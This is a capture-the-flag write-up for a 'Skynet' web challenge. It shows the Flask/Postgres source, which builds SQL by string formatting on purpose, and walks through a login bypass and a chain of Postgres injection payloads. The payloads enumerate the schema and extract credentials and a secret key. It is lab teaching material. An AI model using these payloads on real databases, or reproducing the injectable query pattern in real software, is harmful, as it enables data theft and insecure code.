Description
Hack into skynet to save the world, which way do you prefer?
Code Review
import flask
import psycopg2
import datetime
import hashlib
from skynet import Skynet #Skynet Code is not provided and is unnecessary in order to complete the challenge
app = flask.Flask(__name__, static_url_path='')
skynet = Skynet()
def skynet_detect(): #Skynet Attack Detection System
req = {
'method': flask.request.method,
'path': flask.request.full_path,
'host': flask.request.headers.get('host'),
'content_type': flask.request.headers.get('content-type'),
'useragent': flask.request.headers.get('user-agent'),
'referer': flask.request.headers.get('referer'),
'cookie': flask.request.headers.get('cookie'), #If you can get a sessionId you will gain initial system access
'body': str(flask.request.get_data()),
}
_, result = skynet.classify(req)
return result and result['attack'] #On trying dangerous actions you are denoted an attacker from the system (403 You are not Permitted to Access this Page)
@app.route('/static/<path:path>')
def static_files(path):
return flask.send_from_directory('static', path)
@app.route('/', methods=['GET', 'POST'])
def do_query():
if skynet_detect():
return flask.abort(403) #Skynet is being attacked (User is presented with a 403 HTTP Status Code)
if not query_login_state():
response = flask.make_response('No login, redirecting', 302) #No Login Redirecting
response.location = flask.escape('/login')
return response
if flask.request.method == 'GET':
return flask.send_from_directory('', 'index.html') #Show index.html (index.html was never shown in the webpage URL and never used.)
elif flask.request.method == 'POST':
kt = query_kill_time()
if kt:
result = kt
else:
result = ''
return flask.render_template('index.html', result=result) #The result of attacking Skynet (Take a look at line #38.)
else:
return flask.abort(400)
@app.route('/login', methods=['GET', 'POST'])
def do_login():
if skynet_detect():
return flask.abort(403)
if flask.request.method == 'GET':
return flask.send_from_directory('static', 'login.html')
elif flask.request.method == 'POST':
if not query_login_attempt():
return flask.send_from_directory('static', 'login.html')
else:
session = create_session()
response = flask.make_response('Login success', 302) #We needed to bypass the login system
response.set_cookie('SessionId', session) #We needed a valid sessionId. Was provided after success login bypass.
response.location = flask.escape('/')
return response
else:
return flask.abort(400)
def query_login_state():
sid = flask.request.cookies.get('SessionId', '')
if not sid:
return False
now = datetime.datetime.now()
with psycopg2.connect(
host="challenge-db",
database="ctf", #databse
user="ctf", #username
password="ctf") as conn: #password
cursor = conn.cursor()
cursor.execute("SELECT sessionid"
" FROM login_session"
" WHERE sessionid = %s"
" AND valid_since <= %s"
" AND valid_until >= %s"
"", (sid, now, now))
data = [r for r in cursor.fetchall()]
return bool(data)
def query_login_attempt():
username = flask.request.form.get('username', '')
password = flask.request.form.get('password', '')
if not username and not password: #username=&password=ctf(login bypass)
return False
sql = ("SELECT id, account"
" FROM target_credentials"
" WHERE password = '{}'").format(hashlib.md5(password.encode()).hexdigest())
user = sql_exec(sql)
name = user[0][1] if user and user[0] and user[0][1] else ''
return name == username
def create_session(): #valid sessionId duration
valid_since = datetime.datetime.now()
valid_until = datetime.datetime.now() + datetime.timedelta(days=1)
sessionid = hashlib.md5((str(valid_since)+str(valid_until)+str(datetime.datetime.now())).encode()).hexdigest()
sql_exec_update(("INSERT INTO login_session (sessionid, valid_since, valid_until)"
" VALUES ('{}', '{}', '{}')").format(sessionid, valid_since, valid_until))
return sessionid
def query_kill_time():
name = flask.request.form.get('name', '')
if not name:
return None
sql = ("SELECT name, born"
" FROM target"
" WHERE age > 0"
" AND name = '{}'").format(name) ##SQLi AV.This is where magic happens.
nb = sql_exec(sql) #On a dangerous sql statement, abort operation.
if not nb:
return None
return '{}: {}'.format(*nb[0])
def sql_exec(stmt):
data = list()
try:
with psycopg2.connect(
host="challenge-db",
database="ctf",
user="ctf",
password="ctf") as conn:
cursor = conn.cursor()
cursor.execute(stmt)
for row in cursor.fetchall():
data.append([col for col in row])
cursor.close()
except Exception as e:
print(e)
return data
def sql_exec_update(stmt):
data = list()
try:
with psycopg2.connect(
host="challenge-db",
database="ctf",
user="ctf",
password="ctf") as conn:
cursor = conn.cursor()
cursor.execute(stmt)
conn.commit()
except Exception as e:
print(e)
return data
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8080)Inital Access (Login System Bypass)
Bypassing the login system with a vanilla sqli injection was impossible.
Looking the source code, bypassing was made possible only after providing the following from our proxy
username=&password=ctf.
SQL Injection to reveal the flag
Trying vanilla payloads proved unsuccessful because this is a Postgres SQL Database.
||name||'||name LIMIT 3 OFFSET '2SELECT name, born FROM target WHERE age > 0 AND name = ''||name||'' => SELECT name, born FROM target WHERE age > 0 AND name = name'; select account, password from target_credentials limit 3 offset '0'; select name, age from target limit 3 offset '0 ---'; select table_name, null from information_schema.tables limit 3 offset '0'; select column_name, null from information_schema.columns where table_name='target' limit 3 offset '0'; select column_name, null from information_schema.columns where table_name='target_credentials' limit 3 offset '4'; select secret_key, null from target_credentials limit 3 offset '0
